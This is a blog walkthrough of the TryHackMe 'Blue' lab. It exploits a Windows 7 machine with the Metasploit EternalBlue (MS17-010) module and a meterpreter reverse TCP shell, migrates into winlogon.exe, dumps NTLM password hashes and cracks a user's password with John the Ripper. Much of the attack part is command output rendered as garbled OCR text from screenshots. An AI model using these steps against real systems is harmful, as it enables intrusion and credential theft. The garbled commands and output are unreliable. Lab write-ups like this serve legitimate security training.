Wednesday, December 22, 2021

Hacking Windows using Eternalblue - [THM] Walk-through

In 2017 the EternalBlue exploit was leaked to the public by a hacker group known as the Shadow Brokers. EternalBlue is a software vulnerability in Microsoft's Windows operating system Server Messaging Block (SMB) protocol, specifically SMBv1, and also happens to be the name of the exploit that the Shadow Brokers claim was developed and weaponized by the National Security Agency (NSA) to take advantage of this vulnerability.

This walk-through will demonstrate how EternalBlue can be leveraged to exploit the EternalBlue vulnerability in the Windows SMB protocol allowing an attacker to manipulate flaws to remotely execute code, gain access, and elevate privileges on the remote target. 

Enumerate the target 

We begin by enumerating our target using rustscan. RustScan is an open-source scanning tool, written in the Rust language, that works with Nmap but turns a 17 minute Nmap scan into about 60 seconds give or take. Either way it is much faster. The -- in the command signifies the end of rust commands and the beginning of Nmap scripts command. In this case we are running Nmap's "vuln" script.

File Actions rustscan - Edit View root@kali: — Help -script vuln 10.10.22.224 The argument ' —addresses <addresses> ' requires a value but none was supplied —addresses <addresses> . . rustscan ripts <scripts> —timeout <timeout> —batch-size <batch-size> —scan-order <scan-order> For more information try --help Ct rustscan - 10.10.22.244 —tries <tries> sc -- script vuln The Modern Day Port Scanner. https://discord . gg/GFrQsGy https://github . com/RustScan/RustScan @ https://admin.tryhackme.com

 File Actions Edit View Help PORT 135/tcp 139/tcp 445/tcp STATE open open open SERVICE msrpc netbios-ssn microsoft-ds ms-wbt-server unknown unknown unknown unknown unknown REASON 3389/tcp open sslv2-drown : 49152/tcp open 49153/tcp open 49154/tcp open 49158/tcp open 49160/tcp open syn syn syn syn syn syn syn syn syn -ack -ack -ack -ack -ack -ack -ack -ack -ack tt1 ttl ttl tt1 tt1 ttl ttl ttl ttl 125 125 125 125 125 125 125 125 125 Host script results: samba-vuln-cve-2012-1182: NT STATUS smb-vuln-ms10-054: false smb-vu1n-ms10-061: NT STATUS ACCESS smb-vuln-ms17-010: VULNERABLE: ACCESS DENIED DENIED Remote Code Execution vulnerability in Microsoft SM8v1 servers (ms17-010) state: VULNERABLE IDs : CVE:CVE-2017-0143 Risk factor: HIGH A critical remote code execution vulnerability exists in Microsoft SM8v1 servers (ms17-010) Disclosure date: 2017-03-14 References: https : //blogs . technet . microsoft . com/msrc/2017/05/12/customer-guidance-for-wannacrypt-att acks/ https : //technet . microsoft . com/en-us/library/security/ms17-010. aspx https : //cve . mitre . org/cgi-bin/cvename . cgi?name=CVE-2017-0143

We can see from the output that the target system is listening on ports 139 (NetBIOS) and 445. Therefore, we can deduce that this system most likely has SMB running which we also confirmed using Nmap's vuln script as it identified that the target is indeed vulnerable to SMB remote code execution (RCE) vulnerability MS17-01.

Armed with this knowledge we can now move on to the...

Exploitation Phase

To start the exploitation phase we will fire up the Metasploit Framework (MSF) on our Kali attack system and execute a search for "eternal".

Nmap done: 1 IP address msfconsole d8P 1 host up) scanned in 132.82 seconds c,ttsSb. d8P d8, d888888P d8bd8b.d8p d8888b d888b8b d8P 88P d88 dB 88b 88b 88b , 88b d88' d88b 8b'?8888P' metasploit v6.1.2-dev d8P d888888p 88P . ossssss*' „=aaccaacc:: ?88, .d88b, 88b d8P 888888P d88P d8P d8888b $whi?88b 88b d88 d8P' 88P 88b d88 d88 88b* , , ass; ; 2159 exploits 1147 auxiliary 367 594 payloads 45 encoders 10 nops 8 evasion post Metasploit tip: Enable HTTP request and response logging with set HttpTrace true Starting persistent handler(s) msf6 > 

Starting persistent handler(s) msf6 > search eternal Matching Modules Disclosure # Name 0 exploit/windows/smb/msl 7 _ 2017-03-14 01 Corruption 2017-03-14 2017-03-14 2017-04-14 Date mplon mplon exploi t/windows/smb/msl SMB Remote Windows Code Execution auxi liar y/ admin/ SMB Remote Windows Command Execution auxi liar y/ scanner/ smb/smb_msl 7 _ 010 exploit/windows/smb/smb_doublepulsar_rce Rank average normal normal normal great use Check Yes Yes Yes Description MS17-010 —Blue SMS Remote Windows Kernel PO MS17-010 MS17-010 MS17-010 SMB RCE Detection SMS DOUBLEPULSAR Remote code Execution Interact with a module by name or index. For example msf6 > info 4, use exploit/windows/smb/smb_doublepulsar_rce 

The search provides us with several results. The first one is an SMB Remote Windows kernel pool corruption exploit. We will choose that one. Next, we run show options to see what we have to configure for the attack. Looks like we have to set the remote host (RHOST- victim) and the local host (LHOST -  attacker)

Name exp loi t/windows/ smb /msl 7 _ I u e Disclosure Date 2017-03-14 2017-03-14 2017-04-14 192.168. 73.129 Rank average norma normal normal great Check Yes Yes Description MS17-010 —Blue SMS Remote Windows Kernel PO 01 Corruption exp 01 win Ows sm ms _psexec omance ynergy mplon mplon SMB Remote Windows Code Execution auxi liar y/ admin/ SMB Remote Windows Command Execution auxi liar y/ scanner/ smb/ smb_msl 7 _ 010 exploit/windows/smb/smb_doublepulsar_rce MS17-010 MS17-010 SMB RCE Detection SMS DOUBLEPULSAR Remote code Execution Interact with a module by name or index. For example info 4, use 4 use exploit/windows/smb/smb_doublepulsar_rce sf6 > use 0 msf6 exploit( r/reverse_tcp Module options Name RHOSTS RPORT SMBDomain SMBPass SMBUser Current Setting Required VERIFY ARCH VERIFY TARGET 445 true true yes yes yes yes ) > show options Description The target host(s), range CIDR identifier, or hosts file with syntax The target port (TCP) (Optional) The Windows domain to use for authentication. Only affects Windows Server 2008 R2, Windows 7, Windows Embedded Standard 7 targe t machines. (Optional) The password for the specified username (Optional) The username to authenticate as Check if remote architecture matches exploit Target. Only affects Windows Server 2008 R2, Windows 7, Windows Embedded Standard 7 target ma chines. Check if remote OS matches exploit Target. Only affects Windows Server 2008 R2, Windows 7, Windows Embedded Standard 7 target machines. Payload options (windows/x64/meterpreter/reverse_tcp)• Name EXITFUNC L HOST L PORT Current thread 4444 Setting Required Description yes yes yes 010 Exit technique (Accepted: seh, thread, process, The listen address (an interface may be specified) The listen port eternalblue none) Exploit target: Id Name 0 Automatic Target msf6 

Our victim's IP address (RHOST) is 10.10.22.244, now we have to find out IP address (LHOST). 

10: mtu 65536 qdisc noqueue state UNKNOWN group default q1en 1000 link/loopback øø:øø:øø:øo:øø:øø brd øo:øø:øo:øø:øø:øø ,/8 scope host 10 inet 127.0.0.1 valid_lft forever preferred_lft forever 1/128 scope host inet6 valid_lft forever preferred_lft forever ethø: mtu 1500 qdisc pfifo_fast state UP group default glen 1000 link/ether brd /24 brd inet scope global dynamic noprefixroute etho 192.168.73.129 192.168. 73.255 valid_lft 1511sec preferred_lft 1511sec /64 scope link noprefixroute inet6 few tuna: mtu 1500 qdisc pfifo_fast state UNKNOWN group default glen 500 link/none /17 scope global tunø inet 10.13.24.52 valid_lft forever preferred_lft forever /64 scope link stable-privacy inet6 fe80 valid_lft forever preferred_lft forever 

Next we configure and launch the exploit in MSF. The port settings (LPORT) will default to 4444.

File Actions Edit View Hel sf6 exploit(wumolDwguswOßwsy1_ lhost 10.13.24.52 sf6 exploit( Ind0L•1s/smb/ms17 rhost 10.10.22.224 sf6 010 010 010 root@kali: — ) > set lhost 10.13.24.52 eternalblue ) > set rhost 10.10.22.224 eternalblue ) > exploit eternalblue Started reverse TCP handler on 10.13.24.52:4444 10.10.22.224:445 10.10.22.224:445 10.10.22.224:445 10.10.22.224:445 Using auxiliary/scanner/smb/smb_ms17_010 as check Rex :: ConnectionTimeout: The connection with ( Scanned 1 of 1 hosts (100% complete) The target is not vulnerable. 1 .10.22.224:445) timed out. Exploit completed, but no session was created sf6 exploit(ll•——— ) > set rhost 10.10.22.244 rhost 10.10.22.244 sf6 ) > exploit Started reverse TCP handler on 10.13.24.52:4444

The exploit runs and....Winner winner chicken dinner! The exploit was successful and we now have a reverse TCP shell as the NT System account.

msf6 exploit( rhost 10.10.22.244 msf6 10.10.22.244:445 10.10.22.244 10.10.22.244:445 10.10.22.244:445 10.10.22.244 10.10.22.244:445 10.10.22.244:445 10.10.22.244:445 10.10.22.244:445 10.10.22.244 10.10.22.244 10.10.22.244:445 10.10.22.244:445 10.10.22.244:445 10.10.22.244:445 10.10.22.244:445 10.10.22.244:445 10.10.22.244:445 10.10.22.244:445 10.10.22.244:445 10.10.22.244 Started reverse TCP handler on 10.13.24.52. > set rhost 10.10.22.244 > exploit • 4444 ack 10.10.22.244:445 10.10.22.244:445 (64-bit) 1 x64 :445 :445 :445 :445 :445 Using auxiliary/scanner/smb/smb_ms17_010 as check Host is likely VULNERABLE to MS17-010! - Windows 7 Professional 7601 Service Scanned 1 of 1 hosts (100% complete) The target is vulnerable. Connecting to target for exploitation. Connection established for exploitation. Target OS selected valid for OS indicated by SMS reply CORE raw buffer dump (42 bytes) OXOOOOOOOO 57 69 6e 64 6f 77 73 20 37 20 50 72 6f 66 65 73 Windows 7 Profes 73 69 6f 6e 61 6c 20 37 36 30 31 20 53 65 72 76 sional 7601 serv 69 63 65 20 50 61 63 6b 20 31 ice Pack 1 Target arch selected valid for arch indicated by DCE/RPC reply Trying exploit with 12 Groom Allocations. Sending all but last fragment of exploit packet Starting non-paged pool grooming Sending SMBv2 buffers Closing SMBv1 connection creating free hole adjacent to SM8v2 buffer. Sending final SMBv2 buffers Sending last fragment of exploit packet! Receiving response from exploit packet ETERNALBLUE overwrite completed successfully (OXCOOOOOOD)! Sending egg to corrupted connection. Triggering free of corrupted buffer. sending stage (200262 bytes) to 10.10.22.244 Meterpreter session 1 opened (10.13.24.52:4444 10.10.22.244:49169) at 2021-12-22 -0500 10.10.22.244:445 10.10.22.244:445 10.10.22.244:445 meterpreter > whoami eter reter > getuid server username: NT AUTHORITY\SYSTEM eter reter > —WIN-

Although we landed in a meterpreter session we can us the shell command to get a Windows shell and run whoami to further validate we are NT AUTHORITY\SYSTEM. CNTRL-Z sends shell to background and brings us back to Meterpreter.

File Actions root@kali: — Edit View Help 10.10.22. 244:445 10.10.22 .244:445 10.10.22 .244:445 10.10.22 .244:445 10.10.22 .244:445 10.10.22 .244:445 Sending final SMBv2 buffers. Sending last fragment of exploit packet! Receiving response from exploit packet ETERNALBLUE overwrite completed successfully (OXCOOOOOOD)! Sending egg to corrupted connection. Triggering free of corrupted buffer. sending stage (200262 bytes) to 10.10.22.244 Meterpreter session 1 opened (10.13.24.52:4444 10.10.22.244:49169) at 2021-12-22 -0500 10.10.22.244:445 10.10.22.244:445 10.10.22.244:445 meterpreter > whoami Unknown command: whoami meterpreter > getuid server username: NT AUTHORITY\SYSTEM meterpreter > shell Process 2676 created. Channel 1 created. Microsoft Windows [Version 6.1.7601] Copyright (c) 2009 Microsoft Corporation. C: \Windows\system32>whoami who ami nt authority\system Background channel 1? [y/N] meter r eter > s - —WIN- All rights reserved. 

Privilege Escalation 

Just because we are system doesn't mean our process is. So we want to find a process  that is running at NT AUTHORITY\SYSTEM. We executed the "ps" command and see that winlogon.exe runs as system. We use the "migrate" command to migrate to the winlogon.exe process. Now that we are sure that we are in an elevated Meterpreter shell we will execute a hashdump to dump the non-default user's password and crack it.

meterpreter > migrate 1288 Process already running at PID 1288 meterpreter > migrate -N winlogon.exe Migrating from 1288 to 608 Migration completed successfully meterpreter > hasdump Unknown command: hasdump meterpreter > hashdump Administrator : 500 : aad3b435b51404eeaad3b435b51404ee : 31d6cfe0d16ae931b73c59d7eøc089c Guest : 501 : aad3b435b51404eeaad3b435b51404ee : 31d6cfe0d16ae931b73c59d7eoc089co : : : Jon : 1000 : aad3b435b51404eeaad3b435b51404ee : ffb43f0de35be4dQQ17acøccaad57f8d: meterpreter > 

Once we have the hash for "Jon" there are a couple of ways to go about cracking the password. For the first way we can use a site called CrackStation

 

Another way to crack the password would be to use a tool that is local to our Kali attack box. The tool is John the Ripper. 

/ home/ ka i 'Des ktop/THM/bI ue ion. hash format-NT --wordlist=/opt/rockyou. txt Created directory: /root/ . john Using default input encoding: UTF-8 oaded 1 password hash (NT [MD4 128/128 xop 4x2]) Warning: no OpenMP support for this hash type, consider fopen: /opt/rockyou.txt: No such file or directory / home/ ka i 'Des ktop/THM/bI ue rockyou . txt —fork-4 /usr/share/seclists/passwords/Leaked-Databases/rockyou . txt . tar . gz /usr/share/wordlists/rockyou . txt / home/ ka i 'Des ktop/THM/bI ue ion. hash -format-NT wordlist=/usr/share/wordlists/rockyou . txt Using default input encoding: UTF-8 oaded 1 password hash (NT [MD4 128/128 xop 4x2]) Warning: no OpenMP support for this hash type, consider —fork-4 Press 'q' or Ctrl-C to abort, almost any other key for status (Jon) alqfna22 lg DONE (2021-12-22 11:08) 0.9009g/s 9189Kp/s 9189Kc/s 9189KC/s alqmzp12 alpusidi Use the —show —format-NT" options to display all of the cracked passwords reliably Session completed / home/ ka i 'Des ktop/THM/bI ue ion. hash -format-NT - wordlist=/usr/share/wordlists/rockyou . txt Invalid options combination or duplicate option: —show" / home/ ka i 'Des ktop/THM/bI ue ion. hash -format-NT - show - show Jon : alqfna22 : 1000 : aad3b435b51404eeaad3b435b51404ee : ffb43f0de35be4d9917acøcc8ad57f8d : : : 1 password hash cracked, 0 left / home/ ka i 'Des ktop/THM/bI ue

Now that we have cracked the password it is time to capture the flags. All the flags on TryHackMe have a clue as to where they are located. The clue for the first flag is that it can be found at the system root. 

pmeterpreter > pwd c:\ meterpreter > Is Listing: C: \ Mode 40777/ rwxrwxrwx 40777/ rwxrwxrwx 40777/ rwxrwxrwx 40555/r-xr-xr-x 40555/r-xr-xr-x 40777/ rwxrwxrwx 40777/ rwxrwxrwx 40777/ rwxrwxrwx r-xr-xr-x 40777/ rwxrwxrwx 100666/rw-rw-rw- 0000/ Size 4096 4096 4096 4096 16384 24 Type dir dir dir dir dir dir dir dir dir fil fif Last modified 2009-07-13 2009-07-14 2009-07-13 2009-07-13 2009-07-13 2009-07-13 2018-12-12 2018-12-12 2009-07-13 2018-12-12 1969-12-31 23:18:56 22:13:22 18:01:17 -0400 -0400 -0400 -0400 -0400 -0400 -0500 -0500 -0400 -0500 -0500 Name $Recycle . Bin Documents and Settings PerfLogs Program Files Program Files (x86) ProgramData Recovery System Volume Information sers Windows flagl. txt pagefile.sys

Flag2? This flag can be found at the location where passwords are stored within Windows.

100666/rw-rw-rw- 2019-03-17 40777/ rwxrwxrwx 2009-07-13 100666/rw-rw-rw- 2018-12-12 40777/ rwxrwxrwx 2009-07-13 eter reter > 524288 4096 34 4096 fil dir fil dir 18:21:15 23:20:10 22 23:20:10 -0400 -0400 -0500 -0400 SYSTEM{016888cd-6c6f-11de-8d1d-001e0bcde3ec } . TMcontainer00000000000000000002. regtrans- flag2. txt eter reter > pwd eter reter >

flag3? This flag can be found in an excellent location to loot. After all, Administrators (our "Jon" account is a local admin) usually have pretty interesting things saved.

meterpreter > cd Documents meterpreter > Is Listing: C: \Users\Jon\Documents Mode 40777/ rwxrwxrwx 40777/ rwxrwxrwx 40777/ rwxrwxrwx 100666/rw-rw-rw- 100666/rw-rw-rw- Size 402 37 Type dir dir dir fil fil Last modified 2018-12-12 2018-12-12 2018-12-12 2018-12-12 2018-12-12 22:13:31 22:13:31 22:13:31 22 22 -0500 -0500 -0500 -0500 -0500 Name My Music My Pictures My Videos flag3. txt eter reter > pwd : \Users\Jon\Documents eter reter >


Finally and easier way to find the flags using the Windows command line would be to cd to the top-level drive and run the following command C:\ dir /s *flag* this will show you the location of all the flags.


I appreciate you taking the time to read through and comment on this walk-through. I have taken you all the way to the point of locating the flags. I will leave it up to you to figure out the last step. How to read them #tryharder ;-). Thanks again! and until next time...Happy Hunting!






at
Labels: , , ,

No comments:

Post a Comment

Subscribe to: Post Comments (Atom)

Emerging Threat - The Rise of Quishing: Malicious QR Codes

    A QR code (short for Quick Response code) is a type of barcode that can be scanned by one’s smartphone camera. It stores data like tex...